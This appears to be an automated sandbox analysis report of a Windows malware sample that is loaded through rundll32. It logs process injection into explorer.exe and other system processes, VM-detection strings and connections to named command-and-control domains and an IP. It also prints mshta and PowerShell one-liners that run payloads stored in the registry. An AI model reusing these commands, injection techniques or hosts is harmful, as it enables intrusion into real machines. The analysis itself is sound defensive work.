Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: explorer.exe, 0000001C.00000000.881750747.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: RuntimeBroker.exe, 00000025.00000000.976191564.0000027D4E762000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0457CC4A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0457198F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04580BC5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_04BBCC4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_04BB198F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_04BC0BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 49_2_0097198F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 49_2_00980BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 49_2_0097CC4A

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress, 0_2_6E4B1552
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_045737F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB37F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_04BB37F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 49_2_009737F9

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\explorer.exe Domain query: art.microsoftsofymicrosoftsoft.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs Jump to dropped file
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 9D0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 2D2D64A0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 9D0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9FA000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2B60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9FC000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 30F0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD217F000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 660000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 2D2D64A0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9FA000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 2B60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9FC000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 30F0000 value: 80
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4868 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 6752
Source: C:\Windows\explorer.exe Thread register set: target process: 5288
Source: C:\Windows\explorer.exe Thread register set: target process: 1260
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe Thread register set: target process: 6508
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: explorer.exe, 0000001C.00000000.922381772.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.884577351.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E4B105E
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD2E33 cpuid 0_2_00DD2E33
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6E4B109B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00DD2E33
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457D8BC CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0457D8BC
